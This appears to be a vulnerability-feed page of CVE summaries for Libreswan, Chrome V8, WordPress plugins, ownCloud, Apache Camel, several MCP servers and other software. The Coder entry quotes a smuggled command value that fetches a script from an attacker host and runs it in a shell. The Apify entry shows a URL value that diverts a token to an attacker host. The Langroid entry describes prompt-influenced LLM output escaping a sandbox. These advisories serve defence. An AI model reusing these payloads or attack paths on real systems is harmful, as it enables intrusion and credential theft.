CVSS 4.0
8.6
EPSS
0.4%
CVE-2026-50721 MEDIUM PATCH This Month

Signature forgery and denial-of-service in Libreswan's IKEv1 RSA authentication allows a remote unauthenticated attacker to impersonate an IKE peer or crash the daemon. The flaw lives in RSA_authenticate_hash_signature_raw_rsa(), which fails to validate the length of the authentication hash inside a PKCS #1 (RFC 2313) encoded SIG payload; when a peer uses a small RSA public exponent such as e=3, a Bleichenbacher-style forgery becomes feasible. There is no public exploit identified at time of analysis and it is not in CISA KEV, but the impersonation impact against IKEv1 raw-RSA authentication makes this a high-severity issue (CVSS 8.1); remote code execution is explicitly not possible and X.509 certificate verification is unaffected.

Jwt Attack Denial Of Service RCE Libreswan
NVD
CVSS 3.1
5.9
EPSS
0.4%
CVE-2026-50722 MEDIUM PATCH This Month

Peer impersonation and denial-of-service in Libreswan IPsec/IKEv2 arises from improper DER/ASN.1 digest verification in RSA_authenticate_hash_signature_pkcs1_1_5_rsa() when the IKEv2 AUTH payload uses RSASSA-PKCS1-v1_5 signatures. A remote unauthenticated attacker can mount a Bleichenbacher-style forgery to impersonate a peer when small RSA public exponents (e.g., e=3) are in use, or send an undersized hash to trip an assertion that aborts and restarts the daemon for sustained DoS. A vendor patch is available and there is no public exploit identified at time of analysis; RCE is not possible and X.509 certificate verification of the peer is unaffected.

Jwt Attack Denial Of Service RCE Libreswan
NVD
CVSS 3.1
5.9
EPSS
0.3%
CVE-2026-12413 HIGH This Week

Denial of service in the Libreswan IPsec VPN's pluto daemon allows remote unauthenticated attackers to crash and repeatedly restart the daemon by sending an invalidly formatted IKEv2 fragment. The off-by-one flaw affects any deployment permitting IKEv2 connections that do not explicitly set fragmentation=no, with no authentication or user interaction required; repeated exploitation sustains the outage. No public exploit identified at time of analysis, and no remote code execution is possible despite the mislabeled 'RCE' tag.

Denial Of Service RCE Libreswan
NVD VulDB
CVSS 3.1
7.5
EPSS
0.6%
CVE-2026-38972 HIGH This Week

Local code execution in Notepad3 (versions through 6.25.822.1) arises from an insecure LoadLibrary(L"MSFTEDIT.DLL") call in the About-dialog path within src/Notepad3.c. Because the DLL is loaded by bare name, an attacker who can drop a malicious MSFTEDIT.DLL into the application directory or an earlier search-order location runs arbitrary code as the current user once that user opens the About dialog. No public exploit identified at time of analysis, and EPSS is low at 0.18% (8th percentile), consistent with a local, user-interaction-dependent flaw rather than a mass-exploitation target.

RCE Notepad3
NVD GitHub
CVSS 3.1
7.8
EPSS
0.2%
CVE-2026-49353 npm HIGH PATCH GHSA This Week

Authentication-bypass leading to remote code execution in 9router (npm package 9router) lets attackers reach spawn-capable MCP routes that were meant to be loopback-only. This is an incomplete fix for CVE-2026-46339: the local-only gate in src/dashboardGuard.js decides 'local' from attacker-controllable Host and Origin headers instead of the TCP source address, so any proxied or tunneled (Cloudflare Tunnel / Tailscale) deployment can be tricked into treating remote requests as local. Combined with the deterministic, machine-ID-derived CLI token, a remote attacker can inject JSON-RPC into MCP child processes (node, python, npx, etc.) and execute code on the host; no public exploit identified at time of analysis, though detailed reproduction steps are published in the vendor advisory.

Authentication Bypass Python Information Disclosure RCE
NVD GitHub
CVSS 3.1
7.5
EPSS
0.4%
CVE-2026-52834 Cargo HIGH PATCH GHSA This Week

Heap out-of-bounds writes in jxl-oxide's jxl-grid crate allow attacker-controlled memory corruption on 32-bit platforms when decoding a crafted JPEG XL image, potentially leading to arbitrary code execution. An integer overflow in AlignedGrid's width×height length calculation produces an undersized backing buffer for huge logical dimensions, after which rendering writes through mutable subgrids beyond the allocation. Publicly available exploit code exists in the advisory (miri/ASan PoC tests); no active exploitation is reported (not in CISA KEV) and no EPSS score was provided.

Heap Overflow Buffer Overflow RCE
NVD GitHub
CVSS 3.1
7.3
CVE-2026-58381 MEDIUM This Month

Double-free memory corruption in GIMP's PSP file format parser exposes local users to denial of service and potential arbitrary code execution when opening a specially crafted Paint Shop Pro image file. The flaw in read_layer_block() allows heap memory corruption that reliably crashes GIMP and, in a more sophisticated exploitation scenario, could enable arbitrary code execution with the privileges of the victim user. No public exploit has been identified and this vulnerability does not appear in the CISA KEV catalog, though upstream tagging of the issue as RCE-capable warrants patching in environments where GIMP users may open untrusted image files.

Denial Of Service Buffer Overflow RCE Red Hat Enterprise Linux 6 Red Hat Enterprise Linux 7 +2
NVD
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-7311 HIGH This Week

Arbitrary file deletion in the TinyPNG (JPEG, PNG & WebP image compression) plugin for WordPress affects all versions through 3.6.13, allowing authenticated attackers with author-level access or higher to delete any file the web server can reach. Because deleting sensitive files such as wp-config.php pushes the site into a fresh-install state, this file-deletion primitive can be escalated to full remote code execution. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV, but it was disclosed by Wordfence with a clear exploitation path and carries a CVSS 8.1 (High).

WordPress Path Traversal RCE PHP Tinypng Jpeg Png Webp Image Compression
NVD
CVSS 3.1
8.1
EPSS
0.7%
CVE-2026-44454 Go HIGH PATCH GHSA This Week

Command injection leading to arbitrary code execution affects Coder's self-hosted developer workspace platform via the coder/registry `dotfiles` module, which interpolated the user-controlled `dotfiles_uri` into a shell script without validation. Combined with the Create Workspace page's `mode=auto` deep links, an attacker can craft a single URL that silently provisions a workspace with an attacker-supplied `dotfiles_uri` (e.g. `foo$(curl attacker.example/x | sh).com`), turning it into a one-click RCE against any authenticated user who clicks. CVSS is 8.8 (High) with EPSS at 2.28% (81st percentile); there is no public exploit identified and it is not in CISA KEV, though a proof-of-concept URL is documented in the advisory.

Command Injection RCE
NVD GitHub VulDB
CVSS 3.1
8.8
EPSS
2.3%
CVE-2024-58352 HIGH This Week

Landray OA contains an unauthenticated HQL injection vulnerability that allows unauthenticated attackers to query arbitrary Hibernate entity classes by injecting malicious HQL syntax into the uid. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

RCE Information Disclosure
NVD
CVSS 4.0
8.7
EPSS
0.6%
CVE-2024-14037 CRITICAL HOSTED Monitor

Redsea Cloud eHR contains an arbitrary file upload vulnerability that allows unauthenticated attackers to achieve remote code execution by uploading malicious files through the PtFjk.mob servlet. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

File Upload RCE
NVD
CVSS 4.0
9.3
EPSS
0.7%
CVE-2022-50973 CRITICAL Act Now

Yonyou KSOA 9.0 contains an unauthenticated arbitrary file upload vulnerability in the com.sksoft.bill.ImageUpload servlet that allows unauthenticated attackers to upload arbitrary files by. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

File Upload RCE
NVD
CVSS 4.0
9.3
EPSS
0.9%
CVE-2026-12168 HIGH This Week

Local privilege escalation in Little Orbit's GameFirst Anti-Cheat (GFAC) lets a low-privileged user reach SYSTEM and run arbitrary code in kernel mode by sending crafted messages to the GFAC_Sys_x64.sys minifilter communication port. All GameFirst Anti-Cheat builds up to and including the 2025-07-07 release are affected, and a public GitHub repository covering this CVE alongside two sibling flaws indicates exploit material is available. There is no public exploit identified as being actively used, but the CERT/CC coordination and shared PoC repository make weaponization plausible.

RCE Gamefirst Anti Cheat
NVD GitHub VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-5524 CRITICAL Act Now

Arbitrary file upload leading to remote code execution in the Divi Form Builder WordPress plugin (versions through 5.1.8) lets unauthenticated attackers upload executable PHP files and run arbitrary code on the server. Attacker-controlled input from the acceptFileTypes POST parameter is interpolated directly into the file-validation regex in do_image_upload(), allowing alternate PHP extensions (.phtml, .phar, .php5, .php7) that evade the plugin's .php-only .htaccess block - and on Nginx the .htaccess protection does not apply at all. There is no public exploit identified at time of analysis and it is not in CISA KEV, but the CVSS 9.8 rating and Wordfence's technical disclosure make this a high-priority patching target.

WordPress Nginx PHP RCE File Upload +1
NVD
CVSS 3.1
9.8
EPSS
0.5%
CVE-2026-57624 CRITICAL Act Now

Unauthenticated remote code execution affects Creative Themes' Blocksy Companion Pro WordPress plugin in all versions up to and including 2.1.46, allowing remote attackers to inject and execute arbitrary code (CWE-94) without any authentication or user interaction. Rated CVSS 10.0 with a scope-changed vector, this is a maximum-severity flaw reported by Patchstack. No public exploit identified at time of analysis and it is not currently listed in CISA KEV, but the trivial exploitability of an unauthenticated RCE makes it a high-priority patching target.

Code Injection RCE Blocksy Companion Pro
NVD VulDB
CVSS 3.1
10.0
EPSS
0.7%
CVE-2026-57623 CRITICAL Act Now

Unauthenticated arbitrary code execution affects the W3 Total Cache WordPress caching plugin in all versions up to and including 2.9.4, allowing remote attackers to execute code and fully compromise the underlying site without credentials or user interaction. The scope-changing CVSS 9.0 (Critical) rating reflects the plugin's deep hooks into WordPress request handling. There is no public exploit identified at time of analysis and no CISA KEV listing, though the high exploitability of a widely deployed plugin makes it a strong patching priority.

RCE W3 Total Cache
NVD
CVSS 3.1
9.0
EPSS
0.3%
CVE-2026-27436 CRITICAL Act Now

Remote code execution in the Five Star Business Profile and Schema WordPress plugin (versions up to and including 2.3.19) allows an attacker holding an Editor-level or higher account to inject and execute arbitrary PHP code on the host. Reported by Patchstack and rated CVSS 9.1 due to its scope-changing impact, the flaw turns a trusted content role into full server compromise. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the CWE-94 code-injection root cause makes reliable exploitation straightforward for any authorized high-privilege user.

Code Injection RCE Five Star Business Profile And Schema
NVD VulDB
CVSS 3.1
9.1
EPSS
0.4%
CVE-2026-9834 HIGH This Week

Authenticated OS command injection in the WP Database Backup plugin for WordPress (all versions up to and including 7.11) lets administrator-level users execute arbitrary operating system commands on the underlying server, escalating a WordPress admin foothold into full host RCE. The flaw stems from the wp_db_exclude_table POST parameter being concatenated unescaped into the mysqldump shell command; the injection is stored, so payloads persist in the options table and fire whenever a backup runs. Reported by Wordfence with no public exploit identified at time of analysis and no CISA KEV listing.

Command Injection WordPress RCE PHP Wp Database Backup Unlimited Database Files Backup By Backup For Wp
NVD
CVSS 3.1
7.2
EPSS
2.7%
CVE-2026-14249 HIGH This Week

Unauthenticated code injection in the Request a Quote plugin for WordPress (versions up to and including 2.5.5) lets remote attackers invoke arbitrary zero-argument PHP functions on the server through the emd_delete_file AJAX action. Because the handler is registered for wp_ajax_nopriv and derives a callable function name from the attacker-controlled $_POST['path'] parameter, an attacker can trigger functions such as phpinfo() to expose server configuration and credentials, or destructive built-in functions. No public exploit identified at time of analysis, but the nonce that is the sole gatekeeper is printed directly into the public quote-form page, effectively neutralizing it.

WordPress RCE PHP
NVD VulDB
CVSS 3.1
7.5
EPSS
0.3%
CVE-2026-57268 HIGH This Week

Out-of-bounds array access in GeoVision's GeoWebPlayer addon (also branded 'Web Plugin' in GV-VMS and 'WS Player' in VMS-Cloud) can lead to remote code execution when the addon's localhost WebSocket server processes a saveVideo command with an attacker-controlled index. Because the addon ships with widely-used GeoVision products (GV-VMS, GV-Cloud) and is reachable from a victim's browser via a malicious web page, a lured user visiting attacker-controlled content can trigger an out-of-bounds function-pointer call. This is a Talos-reported (TALOS-2026-2373) issue with no public exploit identified at time of analysis and is not listed in CISA KEV.

RCE Geowebplayer
NVD
CVSS 3.1
8.3
EPSS
0.3%
CVE-2026-55794 PHP HIGH POC PATCH GHSA This Week

Authenticated remote code execution in Craft CMS 5.9.0 through 5.9.x allows control panel users with entry-editing permissions to inject unsandboxed Twig code via the HTTP Referer header during entry save operations. Because the signed redirect URL derived from the attacker-controlled Referer is compiled with renderObjectTemplate() instead of the sandboxed renderSandboxedObjectTemplate(), a low-privileged CMS operator can achieve server-side template injection leading to code execution. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the flaw is fixed in Craft CMS 5.10.0.

Code Injection RCE
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.3%
CVE-2026-14439 CRITICAL PATCH Act Now

Privilege-escalating remote code execution in the Git Service shared by Altium Enterprise Server and Altium 365 lets an authenticated user with basic git access abuse post-clone file-manipulation operations to move arbitrary files outside the repository, plant executable script content, and run code as the Git Service account. On multi-tenant Altium 365 cloud nodes this also created a cross-tenant data-exposure path. No public exploit identified at time of analysis; the CVSS 4.0 score of 9.4 (Critical) reflects full confidentiality, integrity and availability impact with only low privileges required.

Path Traversal RCE
NVD
CVSS 4.0
9.4
EPSS
0.6%
CVE-2026-14426 HIGH PATCH This Week

Use after free in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Memory Corruption Google Denial Of Service Use After Free RCE +1
NVD VulDB
CVSS 3.1
7.5
EPSS
0.2%
CVE-2026-14432 HIGH PATCH This Week

Use-after-free in Chrome's V8 JavaScript engine (versions before 150.0.7871.46) lets a remote attacker achieve arbitrary code execution inside the renderer sandbox by luring a victim to a crafted HTML page. Chromium rated this Medium severity, but the CVSS 8.8 reflects high confidentiality, integrity, and availability impact requiring only a single user click; there is no public exploit identified at time of analysis and CISA's SSVC framework records no known exploitation. Because scope is unchanged (S:U), code execution is confined to the sandbox and does not by itself constitute a full host compromise.

Memory Corruption Google Denial Of Service Use After Free RCE +1
NVD VulDB
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-14393 HIGH PATCH This Week

Remote code execution in Google Chrome's V8 JavaScript engine (versions prior to 150.0.7871.46) allows an attacker to run arbitrary code inside the renderer sandbox when a victim visits a crafted HTML page. The flaw is a use-after-free (CWE-416) reported by Google's own Chrome team; Chromium rated it Medium severity while NVD assigns CVSS 8.8. No public exploit has been identified at time of analysis, and CISA's SSVC framework records exploitation status as 'none'.

Memory Corruption Google Denial Of Service Use After Free RCE +1
NVD VulDB
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-14403 HIGH PATCH This Week

Use after free in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low)

Memory Corruption Google Denial Of Service Use After Free RCE +1
NVD
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-14405 CRITICAL PATCH Act Now

Arbitrary code execution within the renderer sandbox in Google Chrome's V8 JavaScript engine (versions prior to 150.0.7871.46) can be triggered when a victim loads a crafted HTML page. The flaw stems from use of uninitialized memory in V8 and, while carrying a high CVSS base score of 9.6, was rated only Low severity by Chromium because code execution is confined inside the renderer sandbox and still requires a separate sandbox escape for full host compromise. No public exploit identified at time of analysis, and CISA's SSVC framework marks exploitation status as none.

RCE Google Suse
NVD
CVSS 3.1
9.6
EPSS
0.3%
CVE-2026-14431 HIGH PATCH This Week

Remote code execution in Google Chrome's V8 JavaScript engine (all channels prior to 150.0.7871.46) allows a remote attacker to run arbitrary code inside the renderer sandbox by luring a victim to a crafted HTML page. The flaw is a CWE-843 type-confusion bug rated High by Chromium and CVSS 8.8; there is no public exploit identified at time of analysis and CISA's SSVC framework marks exploitation status as none. Because CVSS is AV:N/PR:N with UI:R, exploitation is unauthenticated but requires the victim to open a malicious page.

Memory Corruption RCE Google Suse
NVD
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-14395 HIGH PATCH This Week

Out of bounds write in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low)

Memory Corruption RCE Buffer Overflow Google Suse
NVD
CVSS 3.1
8.8
EPSS
0.2%
CVE-2026-14430 HIGH PATCH This Week

Remote code execution in Google Chrome's V8 JavaScript engine (versions prior to 150.0.7871.46) allows a remote attacker to run arbitrary code inside the renderer sandbox by luring a victim to a crafted HTML page. The flaw is an integer overflow in V8, rated High by Chromium and scored CVSS 8.8; exploitation requires user interaction (visiting a malicious page) but no authentication. There is no public exploit identified at time of analysis, and CISA SSVC records exploitation status as none, indicating no observed in-the-wild activity yet.

RCE Google Suse
NVD
CVSS 3.1
8.8
EPSS
0.3%
CVE-2026-14409 HIGH PATCH This Week

Inappropriate implementation in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low)

RCE Google Privilege Escalation Suse
NVD
CVSS 3.1
7.5
EPSS
0.2%
CVE-2026-14407 HIGH PATCH This Week

Inappropriate implementation in V8 in Google Chrome prior to 150.0.7871.46 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium)

RCE Google Buffer Overflow Suse
NVD
CVSS 3.1
8.8
EPSS
0.3%
CVE-2026-14383 HIGH PATCH This Week

Remote code execution in the V8 JavaScript engine of Google Chrome before 150.0.7871.46 allows a remote attacker who lures a victim to a crafted HTML page to execute arbitrary code — though notably only within the renderer sandbox rather than achieving full host compromise. Rated CVSS 8.8 and stemming from a code-generation flaw (CWE-94) in V8, it affects all Chrome desktop installations on the vulnerable channel; a fix has shipped, but there is no public exploit identified at time of analysis and CISA SSVC records exploitation status as none.

Code Injection Google RCE Suse
NVD
CVSS 3.1
8.8
EPSS
0.3%
CVE-2026-52186 CRITICAL Act Now

SQL injection in the UTT nv518G security gateway (firmware nv518GV3v3.2.7-210919-161313) lets remote attackers inject arbitrary SQL through the gohead/sub_463bbc component, which per the advisory escalates to arbitrary code execution on the device. The flaw is unauthenticated (CVSS 9.8, PR:N) and publicly available exploit code exists via a GitHub write-up, though it is not listed in CISA KEV; EPSS is low at 0.27% (18th percentile), indicating no evidence of widespread automated exploitation yet.

SQLi RCE
NVD GitHub
CVSS 3.1
9.8
EPSS
0.3%
CVE-2026-50143 npm HIGH POC PATCH GHSA This Week

Apify API token exfiltration in @apify/actors-mcp-server 0.10.7 lets a remote attacker steal a victim's bearer credential via URL authority injection (CWE-918/SSRF). Because getActorMCPServerURL() naively concatenates a trusted standby base URL with an attacker-controlled webServerMcpPath from an Actor definition, an Actor published with a value like '@attacker.example/mcp' causes the WHATWG URL parser to resolve the outbound connection to the attacker's host, and connectMCPClient() unconditionally forwards the victim's 'Authorization: Bearer <APIFY_TOKEN>' header there. Publicly available exploit code exists (a Docker-based PoC that captures the token on an attacker HTTPS server); no active exploitation is confirmed.

Python SSRF OpenSSL Node.js Docker +1
NVD GitHub
CVSS 3.1
8.1
CVE-2026-14265 HIGH PATCH This Week

Arbitrary code execution in Amazon's AWS Advanced JDBC Wrapper (versions 3.3.0 through 4.0.0) arises from the RemoteQueryCachePlugin deserializing cached query results from Redis or Valkey via a raw ObjectInputStream with no class filtering. An actor able to write to the shared cache can poison entries with a crafted serialized Java object, triggering gadget-chain execution on every application server that later reads that cache entry. No public exploit identified at time of analysis; risk is elevated because a single poisoned cache key fans out to all consuming app servers.

Deserialization Java Redis RCE Aws Advanced Jdbc Wrapper
NVD GitHub
CVSS 4.0
7.7
EPSS
0.4%
CVE-2026-58592 HIGH POC This Week

Reachable code execution in the Ladybird browser arises from a dangling-reference flaw (CWE-825) in the WebAssembly ESM-integration module loader, where a stack-local Wasm::FunctionType is captured by reference and read after destruction. A malicious web page can chain the resulting stale result-type data into an arbitrary write via the WASM-GC array.set handler and gain code execution in the WebContent process. Reported by VulnCheck with publicly available exploit code exists; it is not listed in CISA KEV, so no confirmed active exploitation, but a working PoC lowers the barrier for weaponization.

RCE Ladybird
NVD GitHub
CVSS 4.0
8.9
EPSS
0.3%
CVE-2026-49987 npm HIGH POC PATCH GHSA This Week

Arbitrary command execution in repomix (npm package, versions < 1.14.1) arises from argument injection in the `--remote-branch` CLI option, whose value is passed unsanitized into `git fetch` and `git checkout` subprocesses within `src/core/git/gitCommand.ts`. Because the branch value is not prefixed with a `--` positional delimiter and skips the `dangerousParams` blocklist that `validateGitUrl()` applies only to the URL, an attacker can inject options such as `--upload-pack` and, combined with an SSH or `file://` remote, execute an arbitrary payload binary with the invoking user's privileges. Publicly available exploit code exists, no active exploitation is confirmed (not in CISA KEV), and the flaw is fixed in v1.14.1.

RCE
NVD GitHub VulDB
CVSS 4.0
7.5
EPSS
0.7%
CVE-2026-49986 PyPI HIGH POC PATCH GHSA This Week

Local arbitrary code execution in the Cortex MCP server (neuro-cortex-memory ≥ 3.17.0) lets an attacker run Python with the victim's user privileges when the open_visualization tool trusts the Claude Code-supplied CLAUDE_PROJECT_DIR as a Cortex developer checkout. Any project a victim opens is treated as a candidate source root, and validation only checks for two trivial marker files (mcp_server/ and ui/unified-viz.html) before executing an attacker-supplied visualize_bootstrap.py via subprocess. A working PoC is included in the advisory; there is no evidence of active exploitation, and the issue is fixed in v3.17.1.

Python RCE
NVD GitHub
CVE-2026-49856 npm MEDIUM PATCH GHSA This Month

SSRF policy bypass in jshookmcp 0.3.1 allows an authenticated MCP client with network domain access to probe internal RFC 1918 and reserved addresses that are explicitly blocked by all other network tools on the same server. The `network_icmp_probe` and `network_traceroute` handlers call `resolveHostname` directly without invoking the central `resolveAuthorizedTransportTarget` guard, creating an inconsistent enforcement boundary. No CISA KEV listing exists, but proof-of-concept test code demonstrating the bypass via the `handleCallTool` dispatch path is included in the GitHub advisory (GHSA-c5r6-m4mr-8q5j), confirming exploitability without external traffic.

SSRF Microsoft Node.js RCE Oracle
NVD GitHub
CVSS 3.1
4.3
EPSS 3% CVSS 9.9
CRITICAL PATCH Act Now

Remote command injection in Coolify (self-hosted PaaS) before 4.0.0-beta.469 lets an authenticated user with application write permissions inject OS commands through deployment-handling fields such as dockerfile_location, achieving arbitrary code execution on the deployment host and exfiltrating secrets via deployment logs. The flaw scores CVSS 9.9 because command injection breaks out of the application context to compromise the underlying server (scope change), exposing environment variables and other applications' secrets. No public exploit has been identified at time of analysis, but the fix is available in tagged release v4.0.0-beta.469.

Command Injection RCE Coolify
NVD GitHub
EPSS 1% CVSS 10.0
CRITICAL PATCH Act Now

Remote code execution in the Langroid Python LLM-agent framework allows an attacker who can influence LLM prompts to escape the intended sandbox and run arbitrary OS commands on the host. The flaw affects TableChatAgent.pandas_eval() and the VectorStore base class, which pass LLM-generated expressions to Python's eval() with an empty locals dict but an unscrubbed globals dict, leaving __builtins__ implicitly available. A full working proof-of-concept is included in the advisory (publicly available exploit code exists); CVSS is scored 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), though real-world exploitation is gated on the non-default full_eval=True setting.

Code Injection Python RCE
NVD GitHub
MEDIUM PATCH This Month

Unauthenticated SSRF in Dragonfly's scheduler v1 gRPC service allows any remote client to force the scheduler to issue HTTP GET requests to arbitrary internal addresses, including loopback (127.0.0.1), cloud metadata endpoints (169.254.0.0/16), and RFC1918 ranges. The scheduler's `DownloadTinyFile()` function constructs HTTP requests from attacker-controlled `PeerHost.Ip` and `PeerHost.DownPort` gRPC fields with no destination address validation, and stores up to 128 bytes of each fetched response in `Task.DirectPiece`, which is subsequently served to other peers. The input tag of 'RCE' in the source intelligence is incorrect - this is a read-SSRF with a limited exfiltration path, not remote code execution. A fully confirmed proof-of-concept exists against v2.4.4-rc.2; no patched release version has been identified at time of analysis.

SSRF RCE
NVD GitHub
EPSS 0% CVSS 9.6
CRITICAL PATCH Act Now

Arbitrary file write in Crawl4AI (the open-source LLM-friendly web crawler by unclecode) before version 0.9.0 lets a malicious website or download control where crawled files land on disk, and because the file contents are also attacker-controlled this escalates to remote code execution. Both the HTTP crawler path (trusting the response Content-Disposition filename) and the browser crawler path (trusting the download's suggested filename) are affected. CVSS is 9.6 (Critical); no public exploit is identified at time of analysis and it is not listed in CISA KEV, but a fix commit and GHSA advisory are published.

Path Traversal RCE Crawl4ai
NVD GitHub
CVSS 9.8
CRITICAL PATCH Act Now

Server-side template injection in Formie, a forms plugin for Craft CMS 5 (verbb/formie 3.0.0-beta.1 through 3.1.26), allows unauthenticated attackers to inject Twig syntax through request-controlled inputs that Hidden fields use as dynamic default values. When a public form contains a Hidden field seeded from the User Agent, Referer, Current URL, a query parameter, or a cookie, the attacker-supplied value reaches Craft's Twig rendering layer and is evaluated server-side, potentially yielding information disclosure, application-state modification, or remote code execution. No public exploit identified at time of analysis, though the flaw is tagged RCE/SSTI and rated CVSS 9.8.

Ssti RCE
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Privilege escalation in the Plesk web hosting control panel lets an authenticated low-privileged user abuse an improper authorization flaw in the XML API to inject arbitrary configuration directives, achieving arbitrary file write as root and full compromise of the underlying server. Rated CVSS 9.9 with a scope change, this turns any valid panel account into root on the host; no public exploit identified at time of analysis and it is not listed in CISA KEV.

Code Injection Privilege Escalation RCE +1
NVD VulDB
EPSS 1% CVSS 10.0
CRITICAL Act Now

Remote code execution in Adobe ColdFusion 2025.9, 2023.20 and all earlier releases lets an unauthenticated network attacker run arbitrary code in the context of the current user via improper input validation (CWE-20), with no user interaction and a scope change to other components. Adobe rates this maximum severity (CVSS 10.0) and self-reported it; there is no public exploit identified at time of analysis and it is not yet listed in CISA KEV. Given ColdFusion's long history of mass-exploited RCE flaws, patching should be treated as urgent despite the current absence of a public PoC.

RCE Coldfusion
NVD VulDB
EPSS 5% CVSS 7.3
HIGH PATCH This Week

Untrusted Java deserialization in Apache OpenNLP's SvmDoccatModel (libsvm document categorization module, versions 3.0.0-M1 through before 3.0.0-M4) lets an attacker who supplies a crafted serialized stream to the public static SvmDoccatModel.deserialize(InputStream) trigger deserialization of an arbitrary object graph before the SvmDoccatModel cast occurs. Where a usable gadget chain exists on the consuming application's classpath, this yields remote code execution in the loading JVM; OpenNLP ships no gadget itself, so realistic risk falls on downstream apps that embed the module alongside vulnerable transitive dependencies. No public exploit identified at time of analysis and the flaw is not in CISA KEV, though the SSVC assessment marks it automatable with partial technical impact.

Deserialization Java RCE +2
NVD
EPSS 0% CVSS 8.0
HIGH PATCH This Week

Remote code execution in ownCloud 10 (before 10.15.3) lets an authenticated administrator abuse a relative path traversal weakness to write or reference files outside intended directories and execute arbitrary code on the server. The high-privilege requirement (PR:H) and high attack complexity (AC:H) constrain who can trigger it, but successful exploitation yields full compromise with a scope change beyond the application context. No public exploit has been identified at time of analysis and the flaw is not listed in CISA KEV.

Path Traversal RCE Owncloud 10
NVD GitHub VulDB
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Server-side request forgery escalating to remote code execution in the SharePoint for ownCloud app (versions prior to 0.4.1, bundled with ownCloud 10 before 10.15.3) lets an already-authenticated administrator coerce the server into making attacker-controlled requests that ultimately run arbitrary code on the host. The flaw is tagged RCE/SSRF and carries an 8.5 CVSS with a scope change (S:C), reflecting that abuse of the SharePoint integration crosses a trust boundary into the underlying system. No public exploit identified at time of analysis and it is not listed in CISA KEV, so this is a patch-and-move-on issue rather than an active-threat emergency.

SSRF Microsoft RCE +2
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Arbitrary code execution in ownCloud Core (ownCloud 10 Classic server, all versions before 10.15.3) allows an administrator to abuse an exposed dangerous method in the Updater component to run code on the server host. Any actor holding administrative credentials - legitimately, or via session hijack/credential theft/CSRF against an admin - can convert web-app admin rights into full server compromise. No public exploit identified at time of analysis and it is not listed in CISA KEV; the vendor-issued GHSA-hvcx-ph66-mmvw advisory and the fix in 10.15.3 are the primary confirmation.

RCE Owncloud Core
NVD GitHub
EPSS 0% CVSS 7.8
HIGH This Week

Stack-based memory corruption in GIMP's PNM image parser lets an attacker execute code or crash the application when a victim opens a malicious PNM/PBM/PGM/PPM file. The flaw is an off-by-one in pnmscanner_gettoken() that writes a null terminator one byte past a stack buffer; it is local and requires the user to open the crafted file (UI:R). No public exploit is identified at time of analysis, and EPSS is low (0.12%), consistent with the CISA SSVC 'Exploitation: none' judgment.

Denial Of Service Buffer Overflow RCE +4
NVD VulDB
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Unauthenticated denial-of-service in elixir-mint's hpax (the HPACK header-compression library for Elixir HTTP/2, versions 0.1.1 through 1.0.3) allows a remote attacker to force superlinear (~O(N²)) CPU consumption by sending a small header block containing an HPACK integer with a long run of continuation octets. Because BEAM integers are arbitrary-precision, the decoder builds an ever-growing bignum with no upper bound, turning a few crafted bytes into a large, attacker-controlled amount of CPU and transient memory - a classic decompression/amplification DoS. No public exploit is identified at time of analysis and it is not in CISA KEV, but a vendor patch (version 1.0.4) is available.

RCE Hpax
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Java object deserialization in the Apache Camel camel-pqc component allows code execution in the key-management application when an attacker who can write to the backing AWS Secrets Manager secret stores a malicious serialized payload. The flaw affects Apache Camel 4.18.0-4.18.2 and 4.19.0-4.20.x, where AwsSecretsManagerKeyLifecycleManager.deserializeMetadata() calls a raw ObjectInputStream.readObject() with no class filter, so gadget side effects fire before the KeyMetadata cast. Rated CVSS 9.8 by Apache, but exploitation genuinely requires IAM write access to the specific secret; there is no public exploit identified at time of analysis and EPSS is low at 0.19% (8th percentile).

Deserialization Hashicorp RCE +2
NVD VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Remote code execution via unsafe Java deserialization affects the camel-pqc component of Apache Camel 4.18.0-4.18.2 and 4.19.0-4.20.x. The HashiCorp Vault and AWS Secrets Manager KeyLifecycleManager implementations (and a legacy-migration path in the file-based manager) read post-quantum key metadata back with a raw ObjectInputStream.readObject() lacking any ObjectInputFilter or allow-list, so a principal able to write to the key backend can plant a gadget object that executes during normal key-lifecycle operations. No public exploit has been identified at time of analysis and EPSS is low (0.19%), but SSVC rates technical impact as total; this is an incomplete-remediation follow-on to CVE-2026-40048.

Deserialization Hashicorp RCE +2
NVD VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

